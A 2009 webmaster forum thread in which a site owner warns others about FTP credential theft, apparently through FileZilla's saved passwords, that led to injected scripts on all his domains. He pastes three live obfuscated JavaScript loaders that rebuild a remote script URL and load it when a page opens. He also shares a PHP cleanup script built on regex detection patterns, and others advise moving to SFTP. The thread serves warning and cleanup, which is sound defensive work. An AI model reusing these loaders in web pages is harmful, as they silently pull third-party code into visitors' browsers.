WARNING. NEW FIREZILLA HACK

**Eagle** · December 10th, 2009, 02:30 AM

hi yall

just wanted to warn you about a new hack/virus/trojan that just infected every domain that i have online on every server.

basically somehow it stoled my ftp accounts ( i was using firezilla for 2 weeks now and this is when the trouble began, before that i was using cuteftp and didn't hadn't any issues until. swiched to firezilla because it seems faster...this was a huge mistake)

the hack is somekind of javascript, that loads an encoded long piece of code at the bottom of every page. so far i've found this pieces of codes on infected files:

Code:

script /*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl = 

document.createElement('script');Jqjzlgspz98uxl.setAttribute('type', 

'text/javascript');Jqjzlgspz98uxl.setAttribute('id', 'myscript1');Jqjzlgspz98uxl.setAttribute('src', 

'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^&(c(o^#m

@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$!(s@$@i^@c

@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$

!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m

)@&/@!!i&n^#!.&#!c)))!o(m#/)((!'.replace(/\(|\)|\^|\!|@|\$|#|&/ig, 

''));Jqjzlgspz98uxl.setAttribute('defer', 'defer');document.body.appendChild(Jqjzlgspz98uxl);}} 

catch(e) {} /script

Code:

script/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = 

document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type', 

'text/javascript');Hva23p3hnyirlpv7.setAttribute('id', 

'myscript1');Hva23p3hnyirlpv7.setAttribute('src',  

'h))t#^t$#))!p&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)@$s)a!m$&s#)^

u!$^n$g#!.$c!^o^@(m#.^n@!#a@@s#$!a#&-(@^g$o)#v)@&$.(!(@(e)&g&!#r)e)@)a^)t$!s(!(a@!l#e@.@)@r)#u(&#!:)

@8!^)0!8$!(0!/^#m$$e)g^&a###v&!i&d!e))#o!@(.(@c&)o$!(m^&/^m&^e((^)g$!((a)#)^v@!i(@&#d#)e@&o$#.^c$!#o

@m^/$#&l$a)r#@(e)^^d#&o(!()u#(t$)e##.$f(r^&(@/!(^&b!!i)$$l@)!)d^&.#@&(d$@$e(/)g$o^o$&^g^!&l()e!).(@^

#c)$!o#&)@@m!/^$'.replace(/\$|\^|\!|&|\)|\(|@|#/ig, ''));Hva23p3hnyirlpv7.setAttribute('defer', 

'defer');document.body.appendChild(Hva23p3hnyirlpv7);}} catch(e) {}/script

Code:

script/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = 

document.createElement('script');H3qqea3ur6p.setAt tribute('type', 

'text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src', 

'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@ 

.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r# 

$#)t))@s#!#)a!l##e@(.))&r$!u!&)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&

^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p

$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c 

!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&

#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 

'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}/script

domains affected so far from every type: submitting domains, blog domains, tube domains, seo domains...so its not some kind of exploit, its a ftp hack. even domains that i just have online and never worked on them were infected.

I don't know yet the source of the hack and how i got infected

The script tries to load some domain.ru scrip (posibile trojan).

I'm trying now to clean the desktop, then contact every host to change ftp passwords and ip lock on connections.

As a removal tool, hosts can do clean the files, and besides that I've found this php code that search for regular expressions and removes them.

Download php removal code here

original creater and instructions here

if some php guru can contact me and help me modify the script (with the regulars expresions that are searched and deleted) so I can remove the code from all the infected files, please contact me asap on 175444555. I will pay you for your work.

further reading on this matter can be found on this dutch thread

Transation here

Thank you and please be aware and check your online files now! If you're not infected backup everything cause this is spreading very fast. A week ago there were 3 pages in google on this matter...now they are over 10 and going up.

**Head Boy** · December 10th, 2009, 03:52 AM

Can you restrict ftp logins to your IP or IP range?

**PXN** · December 10th, 2009, 07:44 AM

do u mean filezilla? never heard of firezilla.

**Eagle** · December 10th, 2009, 08:20 AM

filezilla sry.

here is the scan_files.php script that i'm using right now to clean files from infected domains:

Code:

<?php
echo "<pre>";
set_time_limit(3600);

$exclude_files = array(
	$_SERVER['DOCUMENT_ROOT'] . '/' . 'scan_files.php',
);

$exclude_dirs = array(
	$_SERVER['DOCUMENT_ROOT'] . '/' . 'stats',
);

$update = $_REQUEST["u"] == "1";
$verbose = $_REQUEST["v"] == "1";

function scan_files($dir) {

	global $exclude_files, $exclude_dirs, $update, $verbose;

	// regular expressions to search
	$exp1 = '|<script>/\*GNU GPL\*/ try\{window\.onload = function\(\){(.*)</script>|imU';
	$exp2 = "</script>$";
	$exp3 = "#</script>#";
	$exp4 = "#<!-- ?\n\(function\(.*?\){var .*?unescape\(.*?\);\n -->#";
	$exp5 = "#<!-- ?\n\(function\(.*?\){eval\(unescape\(.*?\);\n -->#";

        //$search = array('|<script>/\*GNU GPL\*/|imU');
        $search = array('|<script>/\*GNU GPL\*/ try\{window\.onload = function\(\){(.*)</script>|imU');


	$dirs_array = array();

	if ($handle = opendir($dir)) {

		echo "Open dir: " . $dir . "\n";
		echo "Files:";

		// this is the correct way to loop over the directory.
		while (false !== ($file = readdir($handle))) {
			if ($file != '.' && $file != '..') {

				$path = $dir . $file;

				if (is_file($path)) {

					// skip large files
					if (filesize($path) > 1000000) {
						continue;
					}

					// exclude files
					if (in_array($path, $exclude_files)) {
						continue;
					}

					// exclude files
					if (endsWith($file, '.bak')) {
						continue;
					}

					if (endsWith($path, '/images/image.php') ||
						endsWith($path, '/images/gifimg.php')) {
						echo "\n===>" . $path . "\n";
						if ($update) {
							unlink($path);
						}
						continue;
					}

					// get content
					$contents = file_get_contents($path);
					$origContents = $contents;

					// loop for search string
					foreach ($search as $pattern) {
						$contents = preg_replace($pattern, "", $contents);
					}

					if ($contents != $origContents) {
						echo "\n===>" . $path;
						//echo "\n";

						if ($update) {
                                                        //chmod($path, "ugo+rw");
							/* if (!$file_handle = fopen($path . '.bak', 'w')) {
								 echo "Cannot open file ({$path}.bak)<br/>\n";
								 exit;
							}

							if (fwrite($file_handle, $origContents) === FALSE) {
								echo "Cannot write to file ({$path}.bak)<br/>\n";
								exit;
							}

                                                        fclose($file_handle); */

							if (!$file_handle = @fopen($path, 'w')) {
								 echo "\nXXX: Cannot open file ({$path})\n";
                                                                 //continue;
								 exit;
							}

							if (@fwrite($file_handle, $contents) === FALSE) {
                                                            echo "\nXXX: Cannot write to file ({$path})\n";
                                                                //continue;
								exit;
							}

							fclose($file_handle);
						}
						elseif ($verbose) {
							echo "**********\norigContents=$origContents\n";
							echo "**********\ncontents=$contents\n";
						}

					}

				} elseif (is_dir($path)) {

					if (in_array($path, $exclude_dirs)) {
						continue;
					}
					$dirs_array[] = $path;

				}
			}
		}
		closedir($handle);
	}

	foreach ($dirs_array as $dir) {
		scan_files($dir . '/');
	}

	unset($dirs_array);
}

function endsWith($string, $ending) {
	$len = strlen($ending);
	$string_end = substr($string, strlen($string) - $len);

	return $string_end == $ending;
}

$start_dir = $_SERVER['DOCUMENT_ROOT'] . '/';

echo 'Starting from: ' . $start_dir . "\n";

scan_files($start_dir);

?>

**Eagle** · December 10th, 2009, 08:22 AM

Originally Posted by Head Boy

Can you restrict ftp logins to your IP or IP range?

trying to do that too. wrote to support on different hosts, waiting for answers now.

**A.J. Angel** · December 10th, 2009, 09:26 AM

How do you know you've been hit?

**Eagle** · December 10th, 2009, 10:03 AM

Originally Posted by A.J. Angel

How do you know you've been hit?

first i spotted the virus code when playing with a new script and didn't know what it was. i ignore it first, than ask the owner script what is that and what is doing..he said no idea, not from my script.

deleted the code and moved on...until i was browsing and reached one of my sites and saw that google is blocking site for malicious software...started to investigate and realized that the code is everywhere, on every domain i own.

I went to mozilla and installed an add-on called noscript that blocks every script from every page you browse until you allow it to run....this is to protect while cleaning the mess.

**mBishop** · December 10th, 2009, 10:13 AM

This isn't anything new folks!

It's a trojan/virus that infects your desktop. It then scans your documents & settings for the files that filezilla and other common FTP programs use to store saved passwords. If your program encrypts the passwords, it can also listen to the FTP packet stream, since FTP transmits passwords in PLAIN TEXT.

DO NOT USE FTP! Use SFTP (ftp over ssh) or FTPSSL to make sure your FTP connection to your server is secure and your password isn't being sent over the internet unencrypted in plain text.

Make sure that any program you use, that has a "save passwords" feature, stores those passwords in an encrypted format that can't be read by malware.

**pf69.com** · December 10th, 2009, 12:57 PM

Originally Posted by mBishop

This isn't anything new folks!

It's a trojan/virus that infects your desktop. It then scans your documents & settings for the files that filezilla and other common FTP programs use to store saved passwords. If your program encrypts the passwords, it can also listen to the FTP packet stream, since FTP transmits passwords in PLAIN TEXT.

DO NOT USE FTP! Use SFTP (ftp over ssh) or FTPSSL to make sure your FTP connection to your server is secure and your password isn't being sent over the internet unencrypted in plain text.

Make sure that any program you use, that has a "save passwords" feature, stores those passwords in an encrypted format that can't be read by malware.

this is some nice info... where can I learn more about SFTP?
is that virus "special" for FILEZILLA or does that read all the info on your PC and then sends it to the "new owners"?

**JACOBKELL** · December 10th, 2009, 01:40 PM

Ah when will people learn....Use SFTP protocol instead FTP and WInscp program instead filezilla.

**Horny Joe** · December 10th, 2009, 02:05 PM

Originally Posted by JACOBKELL

Ah when will people learn....Use SFTP protocol instead FTP and WInscp program instead filezilla.

Downloaded Winscp, but... can't find any FAQ about "Private Key File".... Where can I generate it? Or... is it just a random file I make...

**steveo** · December 10th, 2009, 02:13 PM

Originally Posted by JACOBKELL

Ah when will people learn....Use SFTP protocol instead FTP and WInscp program instead filezilla.

Filezilla also supports sftp.

**calmdev** · December 10th, 2009, 02:55 PM

+1 for sftp & winscp.

**jdoughs** · December 10th, 2009, 02:59 PM

This is the 3rd or 4th thread I've saw with guys getting all their accounts fuxor'd by using Filezilla.

Stop using it, use a real solution.

**mBishop** · December 10th, 2009, 03:07 PM

Filezilla works perfectly fine, there is a setting you can toggle that will let you store your password encrypted, and you can use SFTP instead of FTP.

Personally, I run a Mac, so I use CyberDuck for my file-transfer program, and I just enter my URL's as sftp://domain.com instead of ftp://domain.com

sftp uses port 22, same as SSH, and requires an SSH account, so you may need to request one for access from your host.

I don't even have FTP servers installed on any of my boxes, I just simply run SSHD and use SFTP.

**mBishop** · December 10th, 2009, 03:11 PM

Originally Posted by pf69.com

this is some nice info... where can I learn more about SFTP?
is that virus "special" for FILEZILLA or does that read all the info on your PC and then sends it to the "new owners"?

It reads the data from multiple FTP programs. I'll try to find the stuff I read about it...

edit: found it: http://www.webhostingtalk.com/showthread.php?t=887539

**JACOBKELL** · December 10th, 2009, 03:45 PM

Originally Posted by steveo

Filezilla also supports sftp.

Yes i know i was just pointing a example.Still i never liked filezilla beacuse of it's messy interface.

**redwhiteandblue** · December 10th, 2009, 05:51 PM

Originally Posted by Head Boy

Can you restrict ftp logins to your IP or IP range?

Cyberwurx has this, they call it Paranoid mode - it restricts ftp login to only those IPs that have logged into the user account. Won't help in this case though.

**A.J. Angel** · December 11th, 2009, 04:43 AM

Originally Posted by steveo

Filezilla also supports sftp.

Do you know how to set up Filezilla with SFTP? Sorry if it sounds noob.

**MMarko** · December 11th, 2009, 05:35 AM

Just check options under "server type" in FileZilla.

Thread: WARNING. NEW FIREZILLA HACK

Thread Tools

WARNING. NEW FIREZILLA HACK

Posting Permissions